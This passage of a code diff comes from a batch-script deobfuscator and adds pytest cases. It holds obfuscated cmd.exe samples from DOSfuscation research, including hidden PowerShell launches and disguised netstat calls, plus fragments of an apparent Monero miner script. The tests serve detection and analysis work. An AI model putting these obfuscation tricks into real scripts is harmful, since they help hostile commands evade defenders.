print(tab + "[CHILE CMD]")
734+
print(tab + "[CHILD CMD]")
274735
for child_cmd in deobfuscator.exec_cmd:
275736
child_deobfuscator = copy.deepcopy(deobfuscator)
276737
child_deobfuscator.exec_cmd.clear()
277738
interpret_logical_line(child_deobfuscator, child_cmd, tab=tab + "\t")
278-
print(tab + "[END OF CHILE CMD]")
739+
deobfuscator.exec_cmd.clear()
740+
print(tab + "[END OF CHILD CMD]")
279741

280742

281743
def interpret_logical_line_str(deobfuscator, logical_line, tab=""):
@@ -286,12 +748,13 @@ def interpret_logical_line_str(deobfuscator, logical_line, tab=""):
286748
deobfuscator.interpret_command(normalized_comm)
287749
str = str + tab + normalized_comm
288750
if len(deobfuscator.exec_cmd) > 0:
289-
str = str + tab + "[CHILE CMD]"
751+
str = str + tab + "[CHILD CMD]"
290752
for child_cmd in deobfuscator.exec_cmd:
291753
child_deobfuscator = copy.deepcopy(deobfuscator)
292754
child_deobfuscator.exec_cmd.clear()
293755
interpret_logical_line(child_deobfuscator, child_cmd, tab=tab + "\t")
294-
str = str + tab + "[END OF CHILE CMD]"
756+
deobfuscator.exec_cmd.clear()
757+
str = str + tab + "[END OF CHILD CMD]"
295758
return str
296759

297760

‎tests/test_FE_DOSfuscation.py

+216
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,216 @@
1+
# Tests coming from the FireEye DOSfuscation research
2+
# https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf
3+
import pytest
4+
5+
from batch_deobfuscator.batch_interpreter import BatchDeobfuscator
6+
7+
8+
class TestUnittests:
9+
@staticmethod
10+
@pytest.mark.parametrize(
11+
"logical_line, result",
12+
[
13+
(
14+
",;,cmd.exe,;,/c,;,echo;Command 1&&echo,Command 2",
15+
[" cmd.exe /c echo Command 1", "echo Command 2"],
16+
),
17+
],
18+
)
19+
def test_comma_semi_colon(logical_line, result):
20+
deobfuscator = BatchDeobfuscator()
21+
commands = deobfuscator.get_commands(logical_line)
22+
res = []
23+
for command in commands:
24+
normalized_comm = deobfuscator.normalize_command(command)
25+
deobfuscator.interpret_command(normalized_comm)
26+
res.append(normalized_comm)
27+
28+
assert len(res) == len(result)
29+
for test_res, expected_res in zip(res, result):
30+
assert test_res == expected_res
31+
32+
@staticmethod
33+
@pytest.mark.parametrize(
34+
"statement, result",
35+
[
36+
# Substring
37+
("%COMSPEC%", "C:\\WINDOWS\\system32\\cmd.exe"),
38+
("%COMSPEC:~0%", "C:\\WINDOWS\\system32\\cmd.exe"),
39+
("%COMSPEC:~0,27%", "C:\\WINDOWS\\system32\\cmd.exe"),
40+
("%COMSPEC:~-7%", "cmd.exe"),
41+
("%COMSPEC:~-27%", "C:\\WINDOWS\\system32\\cmd.exe"),
42+
("%COMSPEC:~-7,-4%", "cmd"),
43+
("%COMSPEC:~-27,27%", "C:\\WINDOWS\\system32\\cmd.exe"),
44+
("%COMSPEC:~-7,3%", "cmd"),
45+
("%COMSPEC:~0,1337%", "C:\\WINDOWS\\system32\\cmd.exe"),
46+
("%COMSPEC:~-1337%", "C:\\WINDOWS\\system32\\cmd.exe"),
47+
("%COMSPEC:~-1337,1337%", "C:\\WINDOWS\\system32\\cmd.exe"),
48+
("%COMSPEC:~-40,3%", "C:\\"),
49+
("%COMSPEC:~-1,1%", "e"),
50+
# Substitution
51+
("%COMSPEC:\\=/%", "C:/WINDOWS/system32/cmd.exe"),
52+
("%COMSPEC:KeepMatt=Happy%", "C:\\WINDOWS\\system32\\cmd.exe"),
53+
("%COMSPEC:*System32\\=%", "cmd.exe"),
54+
("%COMSPEC:*Tea=Coffee%", "C:\\WINDOWS\\system32\\cmd.exe"),
55+
("%COMSPEC:*e=z%", "zm32\\cmd.exe"),
56+
("%COMSPEC:*e=Z%", "Zm32\\cmd.exe"),
57+
("%COMSPEC:s=z%", "C:\\WINDOWz\\zyztem32\\cmd.exe"),
58+
("%COMSPEC:s=%", "C:\\WINDOW\\ytem32\\cmd.exe"),
59+
("%COMSPEC:*S=A%", "A\\system32\\cmd.exe"),
60+
("%COMSPEC:*s=A%", "A\\system32\\cmd.exe"),
61+
("%COMSPEC:cMD=BlA%", "C:\\WINDOWS\\system32\\BlA.exe"),
62+
# spacing
63+
("%coMSPec:~ -7, +3%", "cmd"),
64+
("%coMSPec:~ -7, +3%", "cmd"),
65+
# tabs
66+
("%coMSPec:~ -7, +3%", "cmd"),
67+
# set
68+
("%comspec:~-16,1%%comspec:~-1%%comspec:~-13,1%", "set"),
69+
],
70+
)
71+
def test_variable_manipulation(statement, result):
72+
deobfuscator = BatchDeobfuscator()
73+
res = deobfuscator.normalize_command(statement)
74+
assert res == result
75+
76+
@staticmethod
@pytest.mark.parametrize(
    "logical_line, result",
    [
        (
            "s^et g^c^=^er^s&&s^e^t ^tf=^he^ll&&set^ f^a^=^pow&&^s^et^ dq^=C:\\WINDOWS\\System32\\W^i^n^do^ws^!fa^!^!g^c^!!^t^f^!\\^v^1^.0\\^!^fa!^!^gc!!^tf^!&&^ech^o^ hos^tname^;^ ^ | !dq! -^no^p^ ^-",
            [
                "set gc=ers",
                "set tf=hell",
                "set fa=pow",
                "set dq=C:\\WINDOWS\\System32\\Windowspowershell\\v1.0\\powershell",
                "echo hostname; ^",
                "C:\\WINDOWS\\System32\\Windowspowershell\\v1.0\\powershell -nop -",
            ],
        )
    ],
)
def test_echo_pipe(logical_line, result):
    """Split a caret-obfuscated one-liner and compare each normalized command.

    The exact example from page 22 could not be reproduced, so this is a
    similar construct. Constraints observed while writing it:
    - the special characters ``&&`` must not be preceded by ``^`` nor be
      cut in two by ``^``;
    - the special character ``|`` must not be preceded or followed by ``^``.
    """
    interpreter = BatchDeobfuscator()
    normalized = []
    # Each command is interpreted right after being normalized so that the
    # variables it sets are available to the commands that follow.
    for raw_command in interpreter.get_commands(logical_line):
        clean_command = interpreter.normalize_command(raw_command)
        interpreter.interpret_command(clean_command)
        normalized.append(clean_command)

    assert len(normalized) == len(result)
    for actual, expected in zip(normalized, result):
        assert actual == expected
108+
109+
@staticmethod
@pytest.mark.parametrize(
    "logical_line, result",
    [
        ("set com=netstat /ano&&call %com%", ["set com=netstat /ano", "call netstat /ano"]),
        ("set com=netstat /ano&&cmd /c %com%", ["set com=netstat /ano", "cmd /c netstat /ano"]),
        # Disabled because we are currently returning an empty string on non-found variable, which breaks the
        # declaration of !!#**#!! in this case. We'd need to track EnableDelayedExpansion to make it better too.
        # (
        #     "set --$#$--= /ano&&set !!#**#!!=stat&&set .........=net&&call set ''''''''' ''''''=%.........%%!!#**#!!%%--$#$--% &&call %''''''''' ''''''%",
        #     [
        #         "set --$#$--= /ano",
        #         "set !!#**#!!=stat",
        #         "set .........=net",
        #         "call set ''''''''' ''''''=netstat /ano",
        #         "call netstat /ano",
        #     ],
        # ),
        (
            "set ' = /ano&&set ' =stat&& set ' =net&&call set ' =%' %%' %%' %&&call %' %",
            ["set ' = /ano", "set ' =stat", "set ' =net", "call set ' =netstat /ano", "call netstat /ano"],
        ),
        (
            "set command=neZsZ7Z /7no&&set sub2=!command:7=a!&&set sub1=!sub2:Z=t!&&CALL %sub1%",
            ["set command=neZsZ7Z /7no", "set sub2=neZsZaZ /ano", "set sub1=netstat /ano", "CALL netstat /ano"],
        ),
    ],
)
def test_call_var(logical_line, result):
    """Check commands whose final call/cmd argument is built from variables.

    Every command of ``logical_line`` is normalized, interpreted (so later
    commands see the variables it defines) and compared, in order, with the
    matching entry of ``result``.
    """
    interpreter = BatchDeobfuscator()
    normalized = []
    for raw_command in interpreter.get_commands(logical_line):
        clean_command = interpreter.normalize_command(raw_command)
        interpreter.interpret_command(clean_command)
        normalized.append(clean_command)

    assert len(normalized) == len(result)
    for actual, expected in zip(normalized, result):
        assert actual == expected
149+
150+
@staticmethod
def test_empty_var():
    """Undefined variables inside a command normalize to nothing.

    Taken from https://i.blackhat.com/briefings/asia/2018/asia-18-bohannon-invoke_dosfuscation_techniques_for_fin_style_dos_level_cmd_obfuscation.pdf page 48

    This is one of those odd cases where EnableDelayedExpansion makes a
    difference:
    - with EnableDelayedExpansion ON, the trailing ``!`` is lost;
    - with EnableDelayedExpansion OFF, the trailing ``!`` is kept.
    The expectation below is the one without the trailing ``!``.
    """
    interpreter = BatchDeobfuscator()
    obfuscated = 'ec%a%ho "Fi%b%nd Ev%c%il!"'
    assert 'echo "Find Evil"' == interpreter.normalize_command(obfuscated)
161+
162+
@staticmethod
@pytest.mark.skip()
@pytest.mark.parametrize(
    "logical_line",
    [
        """FOR /F "delims=s\\ tokens=4" %%a IN ('set^|findstr PSM') DO %%a hostname""",
        """FOR /F "delims=.M tokens=3" %%a IN ('assoc^|findstr lMo') DO %%a hostname""",
        """FOR /F "delims=s\\ tokens=8" %%a IN ('ftype^|findstr lCo') DO %%a hostname""",
    ],
)
def test_FOR_execution(logical_line):
    """
    Skipped placeholder: no assertion is implemented yet.

    The following line resolves to starting powershell and calling hostname:
    FOR /F "delims=s\\ tokens=4" %%a IN ('set^|findstr PSM') DO %%a hostname

    The output of the "assoc" or "ftype" command can be tokenized the same way
    to build out the word "powershell".
    """
179+
180+
@staticmethod
@pytest.mark.skip()
@pytest.mark.parametrize(
    "logical_line",
    [
        "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&& IF %A==1337 CALL !final:~-12!",
        "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&& IF %A==1337 CALL !final:~7!",
        "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&& IF %A==1337 CALL %final:*final!=%",
        "((sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE ))&&,; fo^R;,;%^a,;; i^N;,,;( ,+1; 3 5 7 +5 1^3 +5,,9 11 +1^3 +1;;+15 ^+13^37;,),;,;d^O,,(;(;s^Et fI^Nal=!finAl!!uni^Que:~ %^a,1!))&&(;i^F,%^a=^=+13^37,(Ca^lL;%fIn^Al:~-12%))",
    ],
)
def test_call_var_for(logical_line):
    """
    Skipped placeholder: no assertion is implemented yet.

    Each sample uses a FOR loop to append single characters of "unique" to
    "final", then CALLs part of "final" once the loop variable equals 1337.
    Reference forms of the samples:

    set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&& IF %A==1337 CALL %final:~-12%
    set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&& IF %A==1337 CALL %final:~7%
    set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&& IF %A==1337 CALL %final:*final!=%%
    ,;c^Md;/^V^:O^N;,;/^C “((sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE ))&&,; fo^R;,;%^a,;; i^N;,,;( ,+1; 3 5 7 +5 1^3 +5,,9 11 +1^3 +1;;+15 ^+13^37;,),;,;d^O,,(;(;s^Et fI^Nal=!finAl!!uni^Que:~ %^a,1!))&&(;i^F,%^a=^=+13^37,(Ca^lL;%fIn^Al:~-12%))”
    """
206+
207+
@staticmethod
@pytest.mark.skip()
def test_set_reverse():
    """
    Skipped placeholder: no assertion is implemented yet.

    Samples that walk the "reverse" variable with FOR /L, appending one
    character at a time to "final" before CALLing a slice of it:

    cmd /V:ON /C “set reverse=ona/ tatsten&& FOR /L %A IN (11 -1 0) DO set final=!final!!reverse:~%A,1!&&IF %A==0 CALL %final:~-12%”

    cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%"

    ,;c^Md;/^V^:O^N;,;/C “((sE^T reVEr^sE=OoBnFaU/S CtAa^TtIsOtNe!n))&&,; fo^R;,;/L,;,%^a,;; i^N;,,;( ,+23; -2;;+1;,) ,;,;d^O,,(;(;s^Et fI^Nal=!finAl!!rev^Erse:~%^a,1!))&& (;i^F,%^a=^=^1,(Ca^lL;%fIn^Al:~-12%))”
    """

‎tests/test_unittests.py

+609
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,609 @@
1+
import pytest
2+
3+
from batch_deobfuscator.batch_interpreter import BatchDeobfuscator
4+
5+
6+
class TestUnittests:
7+
@staticmethod
def test_simple_set():
    """A variable defined with ``set`` is substituted in a later command."""
    interpreter = BatchDeobfuscator()
    interpreter.interpret_command("set WALLET=43DTEF92be6XcPj5Z7U")
    assert interpreter.normalize_command("echo %WALLET%") == "echo 43DTEF92be6XcPj5Z7U"
13+
14+
@staticmethod
def test_variable_in_for():
    """``%WALLET%`` is expanded inside a ``for /f`` line while ``%%a`` is left as is."""
    interpreter = BatchDeobfuscator()
    interpreter.interpret_command("set WALLET=43DTEF92be6XcPj5Z7U")
    for_line = 'for /f "delims=." %%a in ("%WALLET%") do set WALLET_BASE=%%a'
    expected = 'for /f "delims=." %%a in ("43DTEF92be6XcPj5Z7U") do set WALLET_BASE=%%a'
    assert interpreter.normalize_command(for_line) == expected
21+
22+
@staticmethod
def test_unset_variable():
    """A reference to a variable that was never set normalizes to an empty string."""
    interpreter = BatchDeobfuscator()
    message = "echo ERROR: Wrong wallet address length (should be 106 or 95): %WALLET_BASE_LEN%"
    expected = "echo ERROR: Wrong wallet address length (should be 106 or 95): "
    assert interpreter.normalize_command(message) == expected
28+
29+
@staticmethod
def test_caret_pipe():
    """Caret-escaped ``|`` and ``>`` survive splitting, normalizing and re-splitting."""
    interpreter = BatchDeobfuscator()
    expected = 'echo tasklist /fi "imagename eq jin.exe" ^| find ":" ^>NUL'

    # First pass: the trailing newline is dropped and the line stays one command.
    raw_line = 'echo tasklist /fi "imagename eq jin.exe" ^| find ":" ^>NUL\n'
    first_split = list(interpreter.get_commands(raw_line))
    assert first_split == [expected]

    # Normalizing must keep the escaped special characters untouched.
    normalized = interpreter.normalize_command(first_split[0])
    assert normalized == expected

    # Splitting the normalized text again must still yield a single command.
    second_split = list(interpreter.get_commands(normalized))
    assert second_split == [expected]
39+
40+
@staticmethod
def test_simple_set_a():
    """``set /a`` with an expanded built-in variable.

    The expected echo shows the arithmetic expression text wrapped in
    parentheses rather than a computed number.
    """
    interpreter = BatchDeobfuscator()
    assert interpreter.normalize_command("echo %NUMBER_OF_PROCESSORS%") == "echo 4"

    arithmetic = 'set /a "EXP_MONERO_HASHRATE = %NUMBER_OF_PROCESSORS% * 700 / 1000"'
    interpreter.interpret_command(interpreter.normalize_command(arithmetic))

    echoed = interpreter.normalize_command("echo %EXP_MONERO_HASHRATE%")
    assert echoed == "echo (4 * 700 / 1000)"
51+
52+
@staticmethod
@pytest.mark.parametrize(
    "var, echo, result",
    [
        # Simple
        # No space
        ("set EXP=43", "echo *%EXP%*", "echo *43*"),
        ("set EXP=43", "echo *%EXP %*", "echo **"),
        ("set EXP=43", "echo *% EXP%*", "echo **"),
        ("set EXP=43", "echo *% EXP %*", "echo **"),
        # Space after var
        ("set EXP =43", "echo *%EXP%*", "echo **"),
        ("set EXP =43", "echo *%EXP %*", "echo *43*"),
        ("set EXP =43", "echo *% EXP%*", "echo **"),
        ("set EXP =43", "echo *% EXP %*", "echo **"),
        # Space after equal
        ("set EXP= 43", "echo *%EXP%*", "echo * 43*"),
        ("set EXP= 43", "echo *%EXP %*", "echo **"),
        ("set EXP= 43", "echo *% EXP%*", "echo **"),
        ("set EXP= 43", "echo *% EXP %*", "echo **"),
        # Space after value
        ("set EXP=43 ", "echo *%EXP%*", "echo *43 *"),
        ("set EXP=43 ", "echo *%EXP %*", "echo **"),
        ("set EXP=43 ", "echo *% EXP%*", "echo **"),
        ("set EXP=43 ", "echo *% EXP %*", "echo **"),
        # Space after var and after equal
        ("set EXP = 43", "echo *%EXP%*", "echo **"),
        ("set EXP = 43", "echo *%EXP %*", "echo * 43*"),
        ("set EXP = 43", "echo *% EXP%*", "echo **"),
        ("set EXP = 43", "echo *% EXP %*", "echo **"),
        # Double quote
        # Single quote for both var and value
        ("set \"'EXP=43'\"", "echo *%EXP%*", "echo **"),
        ("set \"'EXP=43'\"", "echo *%EXP %*", "echo **"),
        ("set \"'EXP=43'\"", "echo *% EXP%*", "echo **"),
        ("set \"'EXP=43'\"", "echo *% EXP %*", "echo **"),
        ("set \"'EXP=43'\"", "echo *%'EXP%*", "echo *43'*"),
        # Space after var
        ('set "EXP =43"', "echo *%EXP%*", "echo **"),
        ('set "EXP =43"', "echo *%EXP %*", "echo *43*"),
        ('set "EXP =43"', "echo *% EXP%*", "echo **"),
        ('set "EXP =43"', "echo *% EXP %*", "echo **"),
        # Space after equal
        ('set "EXP= 43"', "echo *%EXP%*", "echo * 43*"),
        ('set "EXP= 43"', "echo *%EXP %*", "echo **"),
        ('set "EXP= 43"', "echo *% EXP%*", "echo **"),
        ('set "EXP= 43"', "echo *% EXP %*", "echo **"),
        # Space after var and after equal
        ('set "EXP = 43"', "echo *%EXP%*", "echo **"),
        ('set "EXP = 43"', "echo *%EXP %*", "echo * 43*"),
        ('set "EXP = 43"', "echo *% EXP%*", "echo **"),
        ('set "EXP = 43"', "echo *% EXP %*", "echo **"),
        # Space before var, after var, after equal and after value
        ('set " EXP = 43 "', "echo *%EXP%*", "echo **"),
        ('set " EXP = 43 "', "echo *%EXP %*", "echo * 43 *"),
        ('set " EXP = 43 "', "echo *% EXP%*", "echo **"),
        ('set " EXP = 43 "', "echo *% EXP %*", "echo **"),
        # Single quote
        ("set \"EXP='43'\"", "echo *%EXP%*", "echo *'43'*"),
        ("set \"EXP=' 43'\"", "echo *%EXP%*", "echo *' 43'*"),
        ("set \"EXP =' 43'\"", "echo *%EXP %*", "echo *' 43'*"),
        ("set \"EXP = ' 43'\"", "echo *%EXP %*", "echo * ' 43'*"),
        ("set 'EXP=\"43\"'", "echo *%'EXP%*", 'echo *"43"\'*'),
        ("set \" EXP '=43 ' \" ", "echo *%EXP '%*", "echo *43 ' *"),
        # Double quote as value
        ('set EXP =43^"', "echo *%EXP %*", 'echo *43"*'),
        ('set EXP =43^"3', "echo *%EXP %*", 'echo *43"3*'),
        ('set "EXP=43^""', "echo *%EXP%*", 'echo *43"*'),
        ('set "EXP=43^"3"', "echo *%EXP%*", 'echo *43"3*'),
        ('set EXP=43^"^|', "echo *%EXP%*", 'echo *43"|*'),
        # Getting into really weird stuff
        ("set EXP=4=3", "echo *%EXP%*", "echo *4=3*"),
        ('set ""EXP=43"', 'echo *%"EXP%*', "echo *43*"),
        ('set ""EXP=4"3', 'echo *%"EXP%*', "echo *4*"),
        ('set """EXP=43"', "echo *%EXP%*", "echo **"),
        ('set """EXP=43"', 'echo *%""EXP%*', "echo *43*"),
        ('set "E^XP=43"', "echo *%EXP%*", "echo *43*"),
        ('set " ^"EXP=43"', 'echo *%^"EXP%*', "echo *43*"),
        ('set ^"EXP=43', "echo *%EXP%*", "echo *43*"),
        ('set E^"XP=43', 'echo *%E"XP%*', "echo *43*"),
        ('set E"XP=4"3', 'echo *%E"XP%*', 'echo *4"3*'),
        ('set E"XP=4^""3', 'echo *%E"XP%*', 'echo *4""3*'),
        ('set EXP^"=43', 'echo *%EXP"%*', "echo *43*"),
        ("set EXP=43^^", "echo *%EXP%*", "echo *43*"),
        ("set EXP=4^^3", "echo *%EXP%*", "echo *43*"),
        ("set EXP=43^^ ", "echo *%EXP%*", "echo *43 *"),
        ("set E^^XP=43", "echo *%E^XP%*", "echo *43*"),
        ('set ^"E^^XP=43"', "echo *%E^XP%*", "echo *43*"),
        ('set ^"E^^XP=43^"', "echo *%E^XP%*", "echo *43*"),
        ('set ^"E^^XP=43', "echo *%E^XP%*", "echo *43*"),
        ('set "E^^XP=43"', "echo *%E^^XP%*", "echo *43*"),
        ('set "E^^XP=43', "echo *%E^^XP%*", "echo *43*"),
        ('set E^"XP=4^"3', 'echo *%E"XP%*', 'echo *4"3*'),
        ('set ^"EXP=4^"3', "echo *%EXP%*", "echo *4*"),
        ('set ^"EXP= 4^"3', "echo *%EXP%*", "echo * 4*"),
        ('set ^"E^"XP=43"', 'echo *%E"XP%*', "echo *43*"),
        ('set ^"E^"XP=4^"3', 'echo *%E"XP%*', "echo *4*"),
        ('set ^"E"XP=4^"3"', 'echo *%E"XP%*', 'echo *4"3*'),
        ('set ^"E"XP=4^"3""', 'echo *%E"XP%*', 'echo *4"3"*'),
        ('set "E"XP=4^"3""', 'echo *%E"XP%*', 'echo *4"3"*'),
        ('set ^"E""XP=4^"3', 'echo *%E""XP%*', "echo *4*"),
        ('set "E^"XP=43"', 'echo *%E^"XP%*', "echo *43*"),
        ('set "E^"X"P=43"', 'echo *%E^"X"P%*', "echo *43*"),
        ('set E"E^"XP=43"', 'echo *%E"E^"XP%*', 'echo *43"*'),
        ('set E"E^"XP=43', 'echo *%E"E^"XP%*', "echo *43*"),
        ('set E^"E"X"P=43"', 'echo *%E"E"X"P%*', 'echo *43"*'),
        ('set E"E^"X"P=43"', 'echo *%E"E^"X"P%*', 'echo *43"*'),
        ("set ^|EXP=43", "echo *%|EXP%*", "echo *43*"),
        ("set EXP=43", "echo *%EXP:/=\\%*", "echo *43*"),
        ("set EXP=43/43", "echo *%EXP:/=\\%*", "echo *43\\43*"),
        ("set EXP=43", "echo *%EXP:\\=/%*", "echo *43*"),
        ("set EXP=43\\43", "echo *%EXP:\\=/%*", "echo *43/43*"),
        # TODO: Really, how should we handle that?
        # 'set ""EXP=43'
        # 'set'
        # 'set E'
        # 'set EXP'
        # 'set ^"E^"XP=43'
        # 'set ^"E""XP=43'
        #
        # option a
        ('set /a "EXP = 4 * 700 / 1000"', "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
        ('set /A "EXP = 4 * 700 / 1000"', "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
        ('SET /A "EXP = 4 * 700 / 1000"', "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
        ('SET /a "EXP = 4 * 700 / 1000"', "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
        ("set /a EXP = 4 * 700 / 1000", "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
        ('set /a ^"EXP = 4 * 700 / 1000"', "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
        ('set /a ^"E^"XP = 4 * 700 / 1000^"', "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
        ('set /a "EXP^" = 4 * 700 / 1000"', "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
        ("set /a EX^^P = 4 * 700 / 1000", "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
        ("set /a EX^P = 4 * 700 / 1000", "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
        ("set /a EXP = 4 * OTHER", "echo *%EXP%*", "echo *(4 * OTHER)*"),
        ("set/a EXP = 4 * 2", "echo *%EXP%*", "echo *(4 * 2)*"),
        ("set/AEXP=43", "echo *%EXP%*", "echo *(43)*"),
        ("set/AEXP=4 * 3", "echo *%EXP%*", "echo *(4 * 3)*"),
        # TODO: Really, how should we handle that?
        # 'set /a "EX|P = 4 * 700 / 1000'
        # "set /a EX|P = 4 * 700 / 1000"
        # "set /a EX^|P = 4 * 700 / 1000"
        #
        # option p
        ('set /p "EXP"="What is"', 'echo *%EXP"%*', "echo *__input__*"),
        ('set /p EXP="What is', "echo *%EXP%*", "echo *__input__*"),
        ("set /p EXP=What is", "echo *%EXP%*", "echo *__input__*"),
        ("SET /p EXP=What is", "echo *%EXP%*", "echo *__input__*"),
        ("SET /P EXP=What is", "echo *%EXP%*", "echo *__input__*"),
        ("set /P EXP=What is", "echo *%EXP%*", "echo *__input__*"),
        ('set /p EXP "=What is', 'echo *%EXP "%*', "echo *__input__*"),
        ('set /p EXP "=What is', 'echo *%EXP "%*', "echo *__input__*"),
        ('set /p "EXP =What is', "echo *%EXP %*", "echo *__input__*"),
        ('set /p "EXP ="What is"', "echo *%EXP %*", "echo *__input__*"),
        ('set /p E"XP =What is', 'echo *%E"XP %*', "echo *__input__*"),
        ('set /p E^"XP ="What is"', 'echo *%E"XP %*', "echo *__input__*"),
        ('set /p "E^"XP ="What is"', 'echo *%E^"XP %*', "echo *__input__*"),
        ('set /p E^"XP =What is', 'echo *%E"XP %*', "echo *__input__*"),
        ('set /p "E^|XP =What is', "echo *%E^|XP %*", "echo *__input__*"),
        ("set /p E^|XP =What is", "echo *%E|XP %*", "echo *__input__*"),
        ('set /p ^"EXP =What is', "echo *%EXP %*", "echo *__input__*"),
        ("set /p ^|EXP =What is", "echo *%|EXP %*", "echo *__input__*"),
        # TODO: Really, how should we handle that?
        # 'set /p "EXP "=What is'
        # 'set /p "E^"XP =What is'
        # What about some weird echo statement now?
        ("set EXP=43", "echo %EXP%", "echo 43"),
        ("set EXP=43", "echo !EXP!", "echo 43"),
        ("set EXP=43", "echo ^%EXP%", "echo 43"),
        ("set EXP=43", "echo ^!EXP!", "echo 43"),
        # ("set EXP=43", "echo ^%EX^P%", "echo 43"),  # That's wrong... it actually prints the next line. Ignoring.
        ("set EXP=43", "echo ^!EX^P!", "echo 43"),
        # ("set EXP=43", "echo ^%EXP^%", "echo 43"),  # That's wrong... it actually prints the next line. Ignoring.
        ("set EXP=43", "echo ^!EXP^!", "echo 43"),
    ],
)
def test_set_command(var, echo, result):
    """Interpret one ``set`` statement, then check how an ``echo`` line expands.

    ``var`` is the set command fed to the interpreter, ``echo`` is the line
    normalized afterwards and ``result`` is its expected normalized form.
    """
    interpreter = BatchDeobfuscator()
    interpreter.interpret_command(var)
    assert interpreter.normalize_command(echo) == result
230+
231+
@staticmethod
def test_clear_variable_with_set():
    """``set VAR=`` with nothing after the equal sign removes the variable.

    If you specify only a variable and an equal sign (without <string>) for
    the set command, the <string> value associated with the variable is
    cleared (as if the variable is not there).
    """
    interpreter = BatchDeobfuscator()
    probe = "echo *%EXP%*"
    # (set command to run first or None, is "exp" expected to be tracked, expected echo)
    steps = [
        (None, False, "echo **"),
        ("set EXP=43", True, "echo *43*"),
        ("set EXP= ", True, "echo * *"),
        ("set EXP=", False, "echo **"),
    ]
    for set_command, is_defined, expected in steps:
        if set_command is not None:
            interpreter.interpret_command(set_command)
        assert ("exp" in interpreter.variables) == is_defined
        assert interpreter.normalize_command(probe) == expected
251+
252+
@staticmethod
@pytest.mark.skip()
def test_beautify_strlen_function():
    """
    Skipped placeholder: no assertion is implemented yet.

    Goal: figure out whether the snippet below translates somewhat correctly,
    and how to make it more readable after processing.
    Taken from 6c46550db4dcb3f5171c69c5f1723362f99ec0f16f6d7ab61b6f8d169a6e6bc8

    ":strlen string len"
    "setlocal EnableDelayedExpansion"
    'set "token=#%~1" & set "len=0"'
    "for /L %%A in (12,-1,0) do ("
    ' set/A "len|=1<<%%A"'
    ' for %%B in (!len!) do if "!token:~%%B,1!"=="" set/A "len&=~1<<%%A"'
    ")"
    """
266+
267+
@staticmethod
@pytest.mark.parametrize(
    "statement, commands",
    [
        ('IF "A"=="A" echo AAA', ['IF "A"=="A" (', "echo AAA", ")"]),
        ('IF "A"=="A" (echo AAA)', ['IF "A"=="A" (', "echo AAA", ")"]),
        ('IF "A"=="A" (echo AAA) ELSE echo BBB', ['IF "A"=="A" (', "echo AAA", ") ELSE (", "echo BBB", ")"]),
        (
            'echo ABC && IF "A"=="A" (echo AAA) ELSE echo BBB',
            ["echo ABC", 'IF "A"=="A" (', "echo AAA", ") ELSE (", "echo BBB", ")"],
        ),
        (
            'echo ABC && IF "A"=="A" (echo AAA) ELSE (echo BBB)',
            ["echo ABC", 'IF "A"=="A" (', "echo AAA", ") ELSE (", "echo BBB", ")"],
        ),
        (
            'IF EXIST "%USERPROFILE%\\jin" GOTO REMOVE_DIR1',
            ['IF EXIST "%USERPROFILE%\\jin" (', "GOTO REMOVE_DIR1", ")"],
        ),
        (
            "IF defined EXP (echo Defined) ELSE (echo Undef)",
            ["IF defined EXP (", "echo Defined", ") ELSE (", "echo Undef", ")"],
        ),
        (
            "if %EXP% gtr 8192 ( set PORT=18192 & goto PORT_OK )",
            ["if %EXP% gtr 8192 (", " set PORT=18192", "goto PORT_OK )"],
        ),
        ("if %EXP% gtr 8192 (", ["if %EXP% gtr 8192 ("]),
        (
            "if %errorLevel% == 0 (set ADMIN=1) else (set ADMIN=0)",
            ["if %errorLevel% == 0 (", "set ADMIN=1", ") else (", "set ADMIN=0", ")"],
        ),
        (
            'if exist "%USERPROFILE%\\Start Menu\\Programs" (echo AAA)',
            ['if exist "%USERPROFILE%\\Start Menu\\Programs" (', "echo AAA", ")"],
        ),
        (
            'if exist "%USERPROFILE%\\Start Menu\\Programs" echo AAA',
            ['if exist "%USERPROFILE%\\Start Menu\\Programs" (', "echo AAA", ")"],
        ),
        (
            "if [%var%]==[value] echo AAA",
            ["if [%var%]==[value] (", "echo AAA", ")"],
        ),
        (
            'if "%var%"==[value] echo AAA',
            ['if "%var%"==[value] (', "echo AAA", ")"],
        ),
    ],
)
def test_if_statements(statement, commands):
    """``get_commands`` splits an IF statement into condition, body and closing parts."""
    interpreter = BatchDeobfuscator()
    produced = list(interpreter.get_commands(statement))
    assert produced == commands
320+
321+
@staticmethod
def test_single_quote_var_name_rewrite_1():
    """A variable named ``'`` is defined, sliced, then redefined from its own slices."""
    interpreter = BatchDeobfuscator()

    # Obfuscated statement built from substrings of stock environment variables;
    # once interpreted, a variable named ' is available.
